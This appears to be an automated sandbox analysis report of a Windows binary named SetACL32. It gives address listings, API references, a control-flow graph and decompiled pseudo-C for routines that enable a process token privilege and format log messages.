              0x012aa83d
              0x012aa840
              0x012aa848
              0x012aa84b
              0x012aa953
              0x012aa953
              0x012aa958
              0x012aa959
              0x012aa95a
              0x012aa95b
              0x012aa95c
              0x012aa95d
              0x012aa95e
              0x012aa95f
              0x012aa960
              0x012aa961
              0x012aa963
              0x012aa966
              0x012aa968
              0x012aa987
              0x012aa98f
              0x012aa994
              0x012aa995
              0x012aa996
              0x012aa997
              0x012aa998
              0x012aa999
              0x012aa99a
              0x012aa99b
              0x012aa99c
              0x012aa99d
              0x012aa99e
              0x012aa99f
              0x012aa9a0
              0x012aa9a3
              0x012aa9a4
              0x012aa9ab
              0x012aa9b1
              0x012aa9b3
              0x012aa9b5
              0x012aa9b7
              0x012aa9c2
              0x012aa9c4
              0x012aa9cb
              0x012aa9ce
              0x012aa9d0
              0x012aa9d2
              0x012aa9d5
              0x012aa9d5
              0x012aa9d8
              0x012aa9db
              0x012aa9de
              0x012aa9e1
              0x012aa9e3
              0x012aa9e3
              0x012aa9e8
              0x012aa9f1
              0x012aa9fa
              0x012aa9fa
              0x012aaa02
              0x012aa96a
              0x012aa96a
              0x012aa971
              0x012aa979
              0x012aa97c
              0x012aa97c
              0x012aa851
              0x012aa851
              0x00000000
              0x012aa851
              0x012aa84b
              0x012aa83b
              0x012aa829
              0x012aa800
              0x00000000
              0x00000000
              0x00000000
              0x012aa1b1
              0x012aa1a1
              0x012aa18d
              0x012aa134
              0x012a9fea
              0x012a9fed
              0x00000000
              0x012a9fed
              0x012a9fe8
              0x00000000
              0x00000000
              0x00000000
              0x012a9ebd
              0x00000000
              0x012a9ea8
              0x012a9ec3
              0x012a9ec6
              0x012a9ec9
              0x012a9efd
              0x012a9efd
              0x012a9f00
              0x012a9f02
              0x012a9f09
              0x012a9f10
              0x012a9f14
              0x012a9f17
              0x012a9f4e
              0x012a9f4e
              0x012a9f51
              0x012a9f54
              0x012a9f88
              0x012a9f88
              0x012a9f8b
              0x012a9f8e
              0x012aa7bc
              0x012aa7bf
              0x012aa7c7
              0x012aa7c8
              0x012aa7c9
              0x012aa7cd
              0x012aa7d7
              0x012a9f94
              0x012a9f94
              0x012a9f97
              0x012a9f9e
              0x012a9fa0
              0x012a9fa6
              0x012aa7b2
              0x012aa7b2
              0x012aa7b4
              0x00000000
              0x012a9fac
              0x012a9fac
              0x012a9faf
              0x012a9fb7
              0x012a9fba
              0x00000000
              0x012a9fc0
              0x00000000
              0x012a9fc0
              0x012a9fba
              0x012a9fa6
              0x012a9f56
              0x012a9f56
              0x012a9f59
              0x012a9f60
              0x012a9f62
              0x012a9f68
              0x012a9f7e
              0x012a9f7e
              0x012a9f80
              0x012a9f85
              0x00000000
              0x012a9f6a
              0x012a9f6a
              0x012a9f6d
              0x012a9f75
              0x012a9f78
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9f78
              0x012a9f68
              0x012a9f19
              0x012a9f19
              0x012a9f1f
              0x012a9f26
              0x012a9f28
              0x012a9f2e
              0x012a9f44
              0x012a9f44
              0x012a9f46
              0x012a9f4b
              0x00000000
              0x012a9f30
              0x012a9f30
              0x012a9f33
              0x012a9f3b
              0x012a9f3e
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9f3e
              0x012a9f2e
              0x012a9ecb
              0x012a9ecb
              0x012a9ece
              0x012a9ed5
              0x012a9ed7
              0x012a9edd
              0x012a9ef3
              0x012a9ef3
              0x012a9ef5
              0x012a9efa
              0x00000000
              0x012a9edf
              0x012a9edf
              0x012a9ee2
              0x012a9eea
              0x012a9eed
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9eed
              0x012a9edd
              0x00000000
              0x012a9ec9
              0x012a9a68
              0x012a9a68
              0x012a9a74
              0x012a9a76
              0x012a9a78
              0x012a9a7f
              0x012a9a82
              0x012a9a85
              0x012a9a8a
              0x012a9a8d
              0x00000000
              0x012a9a8d
              0x012a9a62
              0x012a9a34
              0x012a9a34
              0x012a9a3f
              0x012a9b09
              0x012a9b0b
              0x012a9b11
              0x012a9b14
              0x012a9b17
              0x012a9b1a
              0x012a9b1c
              0x012a9b1f
              0x012a9b23
              0x012a9b25
              0x012a9b28
              0x012a9b2f
              0x012a9b31
              0x012a9b38
              0x012a9b3d
              0x012a9b49
              0x012a9b57
              0x012a9b64
              0x012a9b67
              0x012a9b6e
              0x012a9b7b
              0x012a9b82
              0x012a9b88
              0x012a9b8b
              0x012a9b8d
              0x012a9b8d
              0x012a9b94
              0x012a9b99
              0x012a9b99
              0x012a9b9c
              0x012a9ba4
              0x012a9ba6
              0x012a9baa
              0x012a9bad
              0x012a9baf
              0x012a9baf
              0x012a9bb6
              0x012a9bb6
              0x012a9ba4
              0x012a9bbe
              0x012a9bbe
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9a3f
              0x012a9a32
              0x00000000
              0x00000000
              0x00000000
              0x012a99b0
              0x012a99a2
              0x00000000

              APIs
              • EnterCriticalSection.KERNEL32(0130B6D4,EDD8D3B4,?), ref: 012A9982
              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 012A99CB
              • GetCurrentThreadId.KERNEL32 ref: 012A99EE
              • GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 012A9A2A
              • GetLastError.KERNEL32 ref: 012A9A34
              • GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 012A9A9B
              • GetLastError.KERNEL32 ref: 012A9AA5
              • LeaveCriticalSection.KERNEL32(0130B6D4), ref: 012A9BCC
              • LeaveCriticalSection.KERNEL32(0130B6D4), ref: 012A9D45
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: CriticalSection$ErrorLastLeaveNameTimeUser$CurrentEnterFileSystemThread
              • String ID: %d,$%s$@Mhv$CRTCL,$DEBUG,$ERROR,$INFO ,$NONE ,$UNKNW,$WARN ,
              • API String ID: 4039181498-3203905643
              • Opcode ID: 21c8d56bdb7ff35570b5817b440f0e3816c7ed9f2585ab0f010c2df374054379
              • Instruction ID: 00dadc4a533f6a5c5c67ab8721fa2eca098dcc171fa6b6db7904d2ee88658a11
              • Opcode Fuzzy Hash: 21c8d56bdb7ff35570b5817b440f0e3816c7ed9f2585ab0f010c2df374054379
              • Instruction Fuzzy Hash: 3DE19B70A10219CFDF24DFA9C884BAEBBF5BF58318F54461DD505EB285E730A985CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012A2150 Relevance: 28.4, APIs: 11, Strings: 5, Instructions: 374COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 103 12a2150-12a2159 104 12a215b-12a216a 103->104 105 12a2188-12a219c 103->105 106 12a217e-12a2185 call 12cae27 104->106 107 12a216c-12a217a 104->107 106->105 109 12a217c 107->109 110 12a219d-12a2217 call 12cf35f GetCurrentProcess OpenProcessToken 107->110 109->106 114 12a2219-12a221f 110->114 115 12a2224-12a222a 110->115 121 12a2608-12a2625 call 12cae19 114->121 116 12a222e-12a2232 115->116 117 12a222c 115->117 119 12a2236-12a2244 LookupPrivilegeValueW 116->119 120 12a2234 116->120 117->116 122 12a2261-12a2295 AdjustTokenPrivileges 119->122 123 12a2246-12a225c CloseHandle 119->123 120->119 124 12a22b0-12a22b8 GetLastError 122->124 125 12a2297-12a229b GetLastError 122->125 123->121 129 12a25fa-12a2606 CloseHandle 124->129 130 12a22be-12a22f3 call 12a1ee0 call 12a88e0 124->130 125->124 128 12a229d-12a22ab FindCloseChangeNotification 125->128 128->121 129->121 135 12a22f8-12a230f 130->135 136 12a2626 call 12a1d70 135->136 137 12a2315-12a2343 call 1299780 135->137 140 12a262b call 12cf35f 136->140 143 12a2347-12a2438 call 1299a40 * 2 call 12a6d40 call 12a1ee0 call 12a98f0 137->143 144 12a2345 137->144 145 12a2630-12a2635 call 12cf35f 140->145 158 12a243a-12a244c 143->158 159 12a246c-12a2475 143->159 144->143 160 12a244e-12a245c 158->160 161 12a2462-12a2469 call 12cae27 158->161 162 12a24ac-12a24b5 159->162 163 12a2477-12a248c 159->163 160->140 160->161 161->159 166 12a24ec-12a24f2 162->166 167 12a24b7-12a24cc 162->167 164 12a248e-12a249c 163->164 165 12a24a2-12a24a9 call 12cae27 163->165 164->140 164->165 165->162 172 12a2526-12a2540 166->172 173 12a24f4-12a2506 166->173 170 12a24ce-12a24dc 167->170 171 12a24e2-12a24e9 call 12cae27 167->171 170->140 170->171 171->166 175 12a2542-12a2554 172->175 176 12a2574-12a2591 172->176 179 12a2508-12a2516 173->179 180 12a251c-12a2523 call 12cae27 173->180 181 12a256a-12a2571 call 12cae27 175->181 182 12a2556-12a2564 175->182 183 12a2593-12a25a8 176->183 184 12a25c4-12a25ca 176->184 179->140 179->180 180->172 181->176 182->140 182->181 188 12a25ba-12a25c1 call 12cae27 183->188 189 12a25aa-12a25b8 183->189 184->129 190 12a25cc-12a25de 184->190 188->184 189->140 189->188 194 12a25f0-12a25f7 call 12cae27 190->194 195 12a25e0-12a25ee 190->195 194->129 195->145 195->194
              C-Code - Quality: 67%
              			E012A2150(void* __ebx, signed int* __ecx, void* __fp0) {
				intOrPtr _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				int _v40;
				int _v56;
				signed int _v60;
				int _v64;
				int _v80;
				signed int _v84;
				int _v88;
				int _v104;
				signed int _v108;
				int _v112;
				short _v128;
				char _v132;
				struct _TOKEN_PRIVILEGES _v144;
				signed int _v148;
				char _v168;
				signed int _v172;
				char _v192;
				signed int _v196;
				char _v216;
				void* _v220;
				void* _v224;
				int _v252;
				char _v260;
				int _v264;
				int _v268;
				int* _v272;
				void* __edi;
				void* __esi;
				signed int _t126;
				signed int _t132;
				signed int _t133;
				signed int _t137;
				WCHAR* _t138;
				signed int _t139;
				signed int _t141;
				long _t142;
				long _t144;
				signed int _t153;
				signed int _t161;
				short _t167;
				short* _t168;
				short* _t169;
				int _t179;
				intOrPtr _t183;
				intOrPtr _t187;
				int _t191;
				intOrPtr _t195;
				intOrPtr _t199;
				int _t203;
				signed int _t207;
				long _t209;
				void* _t212;
				signed int _t215;
				WCHAR* _t216;
				int* _t225;
				signed int _t228;
				int _t239;
				intOrPtr _t240;
				intOrPtr _t241;
				int _t242;
				intOrPtr _t243;
				intOrPtr _t244;
				int _t245;
				signed int _t246;
				int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				void* _t256;
				void* _t257;
				void* _t258;
				void* _t259;
				void* _t260;
				void* _t261;
				WCHAR* _t263;
				long _t265;
				void* _t266;
				int _t267;
				void* _t269;
				WCHAR* _t273;
				void* _t274;
				int* _t275;
				signed int _t280;
				void* _t284;
				signed int _t288;
				signed int _t289;
				void* _t301;

				_t301 = __fp0;
				_t271 = __ecx;
				_t215 = __ecx[5];
				if(_t215 < 8) {
					L5:
					 *(_t271 + 0x10) = 0;
					 *(_t271 + 0x14) = 7;
					 *_t271 = 0;
					return 0;
				} else {
					_t126 =  *__ecx;
					_t216 = 2 + _t215 * 2;
					if(_t216 < 0x1000) {
						L4:
						_push(_t216);
						E012CAE27(_t126);
						goto L5;
					} else {
						_t246 =  *(_t126 - 4);
						_t216 =  &(_t216[0x11]);
						if(_t126 - _t246 + 0xfffffffc > 0x1f) {
							E012CF35F(__ebx, _t216, _t246, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(__ebx);
							_t212 = _t284;
							_t288 = (_t284 - 0x00000008 & 0xfffffff8) + 4;
							_v12 =  *((intOrPtr*)(_t212 + 4));
							_t280 = _t288;
							_push(0xffffffff);
							_push(0x12e9716);
							_push( *[fs:0x0]);
							_push(_t212);
							_t289 = _t288 - 0xc8;
							_t132 =  *0x1309018; // 0xedd8d3b4
							_t133 = _t132 ^ _t280;
							_v36 = _t133;
							_push(__ecx);
							_push(_t133);
							 *[fs:0x0] =  &_v28;
							_t273 = _t246;
							_t263 = _t216;
							_v224 = 0;
							_t137 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v224);
							__eflags = _t137;
							if(_t137 != 0) {
								__eflags = _t273[0xa] - 8;
								_t138 = _t273;
								if(_t273[0xa] >= 8) {
									_t138 =  *_t273;
								}
								__eflags = _t263[0xa] - 8;
								if(_t263[0xa] >= 8) {
									_t263 =  *_t263;
								}
								_t139 = LookupPrivilegeValueW(_t263, _t138,  &(_v144.Privileges)); // executed
								__eflags = _t139;
								if(_t139 != 0) {
									_v144.PrivilegeCount = 1;
									_v132 = 2;
									_t141 = AdjustTokenPrivileges(_v220, 0,  &_v144, 0, 0, 0); // executed
									__eflags = _t141;
									if(_t141 == 0) {
										L18:
										_t142 = GetLastError();
										__eflags =  *((char*)(_t212 + 0xc));
										_t265 = _t142;
										if( *((char*)(_t212 + 0xc)) == 0) {
											L50:
											CloseHandle(_v220);
											_t144 = _t265;
											goto L51;
										} else {
											_v80 = 0;
											_v64 = 0;
											_v60 = 7;
											_v80 = 0;
											_v16 = 0;
											E012A1EE0(_t212,  &_v80, _t246, _t265, _t273, L"Enabling", 8);
											_v224 = E012A88E0(_t212,  &_v216, _t265, _t265, _t273);
											_v16 = 1;
											_t248 = _v64;
											_t225 = 0x7ffffffe - _t248;
											__eflags = 0x7ffffffe - 0xf;
											if(0x7ffffffe < 0xf) {
												E012A1D70(_t225);
												goto L53;
											} else {
												__eflags = _v60 - 8;
												_t165 =  >=  ? _v80 :  &_v80;
												E01299780( &_v128, _v224, _t225,  >=  ? _v80 :  &_v80, _t248, L" the privilege ", 0xf);
												_v16 = 2;
												__eflags = _t273[0xa] - 8;
												_t167 = _t273[8];
												if(_t273[0xa] >= 8) {
													_t273 =  *_t273;
												}
												_push(_t167);
												_t168 = E01299A40( &_v128, _t301, _t273);
												_v56 = 0;
												_v40 = 0;
												_v36 = 0;
												asm("movups xmm0, [eax]");
												asm("movups [ebp-0x2c], xmm0");
												asm("movq xmm0, [eax+0x10]");
												asm("movq [ebp-0x1c], xmm0");
												 *(_t168 + 0x10) = 0;
												 *(_t168 + 0x14) = 7;
												 *_t168 = 0;
												_push(0xe);
												_v16 = 3;
												_t169 = E01299A40( &_v56, _t301, L" failed with: ");
												asm("movups xmm0, [eax]");
												asm("movups [ebp-0x9c], xmm0");
												asm("movq xmm0, [eax+0x10]");
												asm("movq [ebp-0x8c], xmm0");
												 *(_t169 + 0x10) = 0;
												 *(_t169 + 0x14) = 7;
												 *_t169 = 0;
												_push(_v224);
												_v16 = 4;
												E012A6D40(_t212,  &_v192, _t265, _v224,  &_v168);
												_v16 = 5;
												_v104 = 0;
												_v88 = 0;
												_v84 = 7;
												_v104 = 0;
												E012A1EE0(_t212,  &_v104, _t248, _t265, _t273, L"SetPrivilege", 0xc);
												_push(0x80000000);
												_v16 = 6;
												_push( &_v192);
												_push( &_v104);
												E012A98F0(_t212, _t265, _t301, 3);
												_t250 = _v84;
												__eflags = _t250 - 8;
												if(_t250 < 8) {
													L26:
													_t251 = _v172;
													__eflags = _t251 - 8;
													if(_t251 < 8) {
														L30:
														_t252 = _v148;
														__eflags = _t252 - 8;
														if(_t252 < 8) {
															L34:
															_t253 = _v36;
															__eflags = _t253 - 8;
															if(_t253 < 8) {
																L38:
																_t254 = _v108;
																_v40 = 0;
																_v36 = 7;
																_v56 = 0;
																__eflags = _t254 - 8;
																if(_t254 < 8) {
																	L42:
																	_t255 = _v196;
																	_v112 = 0;
																	_v108 = 7;
																	_v128 = 0;
																	__eflags = _t255 - 8;
																	if(_t255 < 8) {
																		L46:
																		_t246 = _v60;
																		__eflags = _t246 - 8;
																		if(_t246 < 8) {
																			goto L50;
																		} else {
																			_t239 = _v80;
																			_t246 = 2 + _t246 * 2;
																			_t179 = _t239;
																			__eflags = _t246 - 0x1000;
																			if(_t246 < 0x1000) {
																				L49:
																				_push(_t246);
																				E012CAE27(_t239);
																				goto L50;
																			} else {
																				_t225 =  *(_t239 - 4);
																				_t248 = _t246 + 0x23;
																				__eflags = _t179 - _t225 + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L54;
																				} else {
																					goto L49;
																				}
																			}
																		}
																	} else {
																		_t240 = _v216;
																		_t256 = 2 + _t255 * 2;
																		_t183 = _t240;
																		__eflags = _t256 - 0x1000;
																		if(_t256 < 0x1000) {
																			L45:
																			_push(_t256);
																			E012CAE27(_t240);
																			_t289 = _t289 + 8;
																			goto L46;
																		} else {
																			_t225 =  *(_t240 - 4);
																			_t248 = _t256 + 0x23;
																			__eflags = _t183 - _t225 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L53;
																			} else {
																				goto L45;
																			}
																		}
																	}
																} else {
																	_t241 = _v128;
																	_t257 = 2 + _t254 * 2;
																	_t187 = _t241;
																	__eflags = _t257 - 0x1000;
																	if(_t257 < 0x1000) {
																		L41:
																		_push(_t257);
																		E012CAE27(_t241);
																		_t289 = _t289 + 8;
																		goto L42;
																	} else {
																		_t225 =  *(_t241 - 4);
																		_t248 = _t257 + 0x23;
																		__eflags = _t187 - _t225 + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L53;
																		} else {
																			goto L41;
																		}
																	}
																}
															} else {
																_t242 = _v56;
																_t258 = 2 + _t253 * 2;
																_t191 = _t242;
																__eflags = _t258 - 0x1000;
																if(_t258 < 0x1000) {
																	L37:
																	_push(_t258);
																	E012CAE27(_t242);
																	_t289 = _t289 + 8;
																	goto L38;
																} else {
																	_t225 =  *(_t242 - 4);
																	_t248 = _t258 + 0x23;
																	__eflags = _t191 - _t225 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L53;
																	} else {
																		goto L37;
																	}
																}
															}
														} else {
															_t243 = _v168;
															_t259 = 2 + _t252 * 2;
															_t195 = _t243;
															__eflags = _t259 - 0x1000;
															if(_t259 < 0x1000) {
																L33:
																_push(_t259);
																E012CAE27(_t243);
																_t289 = _t289 + 8;
																goto L34;
															} else {
																_t225 =  *(_t243 - 4);
																_t248 = _t259 + 0x23;
																__eflags = _t195 - _t225 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L53;
																} else {
																	goto L33;
																}
															}
														}
													} else {
														_t244 = _v192;
														_t260 = 2 + _t251 * 2;
														_t199 = _t244;
														__eflags = _t260 - 0x1000;
														if(_t260 < 0x1000) {
															L29:
															_push(_t260);
															E012CAE27(_t244);
															_t289 = _t289 + 8;
															goto L30;
														} else {
															_t225 =  *(_t244 - 4);
															_t248 = _t260 + 0x23;
															__eflags = _t199 - _t225 + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L53;
															} else {
																goto L29;
															}
														}
													}
												} else {
													_t245 = _v104;
													_t261 = 2 + _t250 * 2;
													_t203 = _t245;
													__eflags = _t261 - 0x1000;
													if(_t261 < 0x1000) {
														L25:
														_push(_t261);
														E012CAE27(_t245);
														_t289 = _t289 + 8;
														goto L26;
													} else {
														_t225 =  *(_t245 - 4);
														_t248 = _t261 + 0x23;
														__eflags = _t203 - _t225 + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															L53:
															E012CF35F(_t212, _t225, _t248, __eflags);
															L54:
															E012CF35F(_t212, _t225, _t248, __eflags);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t280);
															_push(0xffffffff);
															_push(0x12e975e);
															_push( *[fs:0x0]);
															_push(_t273);
															_push(_t265);
															_t153 =  *0x1309018; // 0xedd8d3b4
															_push(_t153 ^ _t289);
															 *[fs:0x0] =  &_v260;
															_t267 = _t248;
															_t275 = _t225;
															_v264 = _t275;
															_v252 = 0;
															_v272 = _t275;
															_v268 = 0;
															 *_t275 = 0;
															_t275[4] = 0;
															_t275[5] = 7;
															 *_t275 = 0;
															E012A1EE0(_t212, _t225, _t248, _t267, _t275, 0x12f983c, 0);
															_v252 = 0;
															__eflags =  *((intOrPtr*)(_t267 + 0x14)) - 8;
															_v268 = 1;
															_v264 = 0;
															if( *((intOrPtr*)(_t267 + 0x14)) >= 8) {
																_t267 =  *_t267;
															}
															E012D3FE8( &_v32, 0, _t267); // executed
															_t249 = _v32;
															__eflags = _t249;
															if(_t249 != 0) {
																_t228 = _t249;
																_t122 = _t228 + 2; // 0x2
																_t269 = _t122;
																do {
																	_t161 =  *_t228;
																	_t228 = _t228 + 2;
																	__eflags = _t161;
																} while (_t161 != 0);
																__eflags = _t228 - _t269;
																E012A1EE0(_t212, _t275, _t249, _t269, _t275, _t249, _t228 - _t269 >> 1);
																E012D3434(_v32);
															}
															 *[fs:0x0] = _v28;
															return _t275;
														} else {
															goto L25;
														}
													}
												}
											}
										}
									} else {
										_t207 = GetLastError();
										__eflags = _t207;
										if(_t207 != 0) {
											goto L18;
										} else {
											FindCloseChangeNotification(_v220); // executed
											_t144 = 0;
											goto L51;
										}
									}
								} else {
									_t209 = GetLastError();
									CloseHandle(_v220);
									_t144 = _t209;
									goto L51;
								}
							} else {
								_t144 = GetLastError();
								L51:
								 *[fs:0x0] = _v24;
								_pop(_t266);
								_pop(_t274);
								__eflags = _v32 ^ _t280;
								return E012CAE19(_t144, _t212, _v32 ^ _t280, _t246, _t266, _t274);
							}
						} else {
							_t126 = _t246;
							goto L4;
						}
					}
				}
			}




































































































              0x012a2150
              0x012a2151
              0x012a2153
              0x012a2159
              0x012a2188
              0x012a218a
              0x012a2191
              0x012a2198
              0x012a219c
              0x012a215b
              0x012a215b
              0x012a215d
              0x012a216a
              0x012a217e
              0x012a217e
              0x012a2180
              0x00000000
              0x012a216c
              0x012a216c
              0x012a216f
              0x012a217a
              0x012a219d
              0x012a21a2
              0x012a21a3
              0x012a21a4
              0x012a21a5
              0x012a21a6
              0x012a21a7
              0x012a21a8
              0x012a21a9
              0x012a21aa
              0x012a21ab
              0x012a21ac
              0x012a21ad
              0x012a21ae
              0x012a21af
              0x012a21b0
              0x012a21b1
              0x012a21b9
              0x012a21c0
              0x012a21c4
              0x012a21c6
              0x012a21c8
              0x012a21d3
              0x012a21d4
              0x012a21d5
              0x012a21db
              0x012a21e0
              0x012a21e2
              0x012a21e5
              0x012a21e7
              0x012a21eb
              0x012a21f1
              0x012a21f3
              0x012a21fb
              0x012a220f
              0x012a2215
              0x012a2217
              0x012a2224
              0x012a2228
              0x012a222a
              0x012a222c
              0x012a222c
              0x012a222e
              0x012a2232
              0x012a2234
              0x012a2234
              0x012a223c
              0x012a2242
              0x012a2244
              0x012a226d
              0x012a2280
              0x012a2287
              0x012a2293
              0x012a2295
              0x012a22b0
              0x012a22b0
              0x012a22b2
              0x012a22b6
              0x012a22b8
              0x012a25fa
              0x012a2600
              0x012a2606
              0x00000000
              0x012a22be
              0x012a22c0
              0x012a22c7
              0x012a22ce
              0x012a22d5
              0x012a22e3
              0x012a22e6
              0x012a22f8
              0x012a22fe
              0x012a2307
              0x012a230a
              0x012a230c
              0x012a230f
              0x012a2626
              0x00000000
              0x012a2315
              0x012a2315
              0x012a231e
              0x012a2333
              0x012a2338
              0x012a233c
              0x012a2340
              0x012a2343
              0x012a2345
              0x012a2345
              0x012a2347
              0x012a234c
              0x012a2351
              0x012a235a
              0x012a2361
              0x012a2368
              0x012a236b
              0x012a236f
              0x012a2374
              0x012a2379
              0x012a2380
              0x012a2387
              0x012a238a
              0x012a2394
              0x012a2398
              0x012a239f
              0x012a23a2
              0x012a23a9
              0x012a23ae
              0x012a23b6
              0x012a23bd
              0x012a23c4
              0x012a23c7
              0x012a23d3
              0x012a23e4
              0x012a23e9
              0x012a23f4
              0x012a2400
              0x012a2407
              0x012a240e
              0x012a2412
              0x012a2417
              0x012a2422
              0x012a2426
              0x012a242a
              0x012a242d
              0x012a2432
              0x012a2435
              0x012a2438
              0x012a246c
              0x012a246c
              0x012a2472
              0x012a2475
              0x012a24ac
              0x012a24ac
              0x012a24b2
              0x012a24b5
              0x012a24ec
              0x012a24ec
              0x012a24ef
              0x012a24f2
              0x012a2526
              0x012a2526
              0x012a252b
              0x012a2532
              0x012a2539
              0x012a253d
              0x012a2540
              0x012a2574
              0x012a2574
              0x012a257c
              0x012a2583
              0x012a258a
              0x012a258e
              0x012a2591
              0x012a25c4
              0x012a25c4
              0x012a25c7
              0x012a25ca
              0x00000000
              0x012a25cc
              0x012a25cc
              0x012a25cf
              0x012a25d6
              0x012a25d8
              0x012a25de
              0x012a25f0
              0x012a25f0
              0x012a25f2
              0x00000000
              0x012a25e0
              0x012a25e0
              0x012a25e3
              0x012a25eb
              0x012a25ee
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a25ee
              0x012a25de
              0x012a2593
              0x012a2593
              0x012a2599
              0x012a25a0
              0x012a25a2
              0x012a25a8
              0x012a25ba
              0x012a25ba
              0x012a25bc
              0x012a25c1
              0x00000000
              0x012a25aa
              0x012a25aa
              0x012a25ad
              0x012a25b5
              0x012a25b8
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a25b8
              0x012a25a8
              0x012a2542
              0x012a2542
              0x012a2545
              0x012a254c
              0x012a254e
              0x012a2554
              0x012a256a
              0x012a256a
              0x012a256c
              0x012a2571
              0x00000000
              0x012a2556
              0x012a2556
              0x012a2559
              0x012a2561
              0x012a2564
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a2564
              0x012a2554
              0x012a24f4
              0x012a24f4
              0x012a24f7
              0x012a24fe
              0x012a2500
              0x012a2506
              0x012a251c
              0x012a251c
              0x012a251e
              0x012a2523
              0x00000000
              0x012a2508
              0x012a2508
              0x012a250b
              0x012a2513
              0x012a2516
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a2516
              0x012a2506
              0x012a24b7
              0x012a24b7
              0x012a24bd
              0x012a24c4
              0x012a24c6
              0x012a24cc
              0x012a24e2
              0x012a24e2
              0x012a24e4
              0x012a24e9
              0x00000000
              0x012a24ce
              0x012a24ce
              0x012a24d1
              0x012a24d9
              0x012a24dc
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a24dc
              0x012a24cc
              0x012a2477
              0x012a2477
              0x012a247d
              0x012a2484
              0x012a2486
              0x012a248c
              0x012a24a2
              0x012a24a2
              0x012a24a4
              0x012a24a9
              0x00000000
              0x012a248e
              0x012a248e
              0x012a2491
              0x012a2499
              0x012a249c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a249c
              0x012a248c
              0x012a243a
              0x012a243a
              0x012a243d
              0x012a2444
              0x012a2446
              0x012a244c
              0x012a2462
              0x012a2462
              0x012a2464
              0x012a2469
              0x00000000
              0x012a244e
              0x012a244e
              0x012a2451
              0x012a2459
              0x012a245c
              0x012a262b
              0x012a262b
              0x012a2630
              0x012a2630
              0x012a2635
              0x012a2636
              0x012a2637
              0x012a2638
              0x012a2639
              0x012a263a
              0x012a263b
              0x012a263c
              0x012a263d
              0x012a263e
              0x012a263f
              0x012a2640
              0x012a2643
              0x012a2645
              0x012a2650
              0x012a2654
              0x012a2655
              0x012a2656
              0x012a265d
              0x012a2661
              0x012a2667
              0x012a2669
              0x012a266b
              0x012a266e
              0x012a2677
              0x012a267a
              0x012a2682
              0x012a2688
              0x012a268f
              0x012a269b
              0x012a269e
              0x012a26a3
              0x012a26aa
              0x012a26ae
              0x012a26b5
              0x012a26bc
              0x012a26be
              0x012a26be
              0x012a26c7
              0x012a26cc
              0x012a26d2
              0x012a26d4
              0x012a26d6
              0x012a26d8
              0x012a26d8
              0x012a26e0
              0x012a26e0
              0x012a26e3
              0x012a26e6
              0x012a26e6
              0x012a26eb
              0x012a26f3
              0x012a26fb
              0x012a2700
              0x012a2708
              0x012a2715
              0x00000000
              0x00000000
              0x00000000
              0x012a245c
              0x012a244c
              0x012a2438
              0x012a230f
              0x012a2297
              0x012a2297
              0x012a2299
              0x012a229b
              0x00000000
              0x012a229d
              0x012a22a3
              0x012a22a9
              0x00000000
              0x012a22a9
              0x012a229b
              0x012a2246
              0x012a2246
              0x012a2254
              0x012a225a
              0x00000000
              0x012a225a
              0x012a2219
              0x012a2219
              0x012a2608
              0x012a260b
              0x012a2613
              0x012a2614
              0x012a2618
              0x012a2625
              0x012a2625
              0x012a217c
              0x012a217c
              0x00000000
              0x012a217c
              0x012a217a
              0x012a216a

              APIs
              • GetCurrentProcess.KERNEL32(00000028,?,EDD8D3B4), ref: 012A2208
              • OpenProcessToken.ADVAPI32(00000000), ref: 012A220F
              • GetLastError.KERNEL32 ref: 012A2219
              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 012A223C
              • GetLastError.KERNEL32(?,?,?), ref: 012A2246
              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 012A2254
              • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000,?,?,?), ref: 012A2287
              • GetLastError.KERNEL32(?,?,?), ref: 012A2297
              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 012A22A3
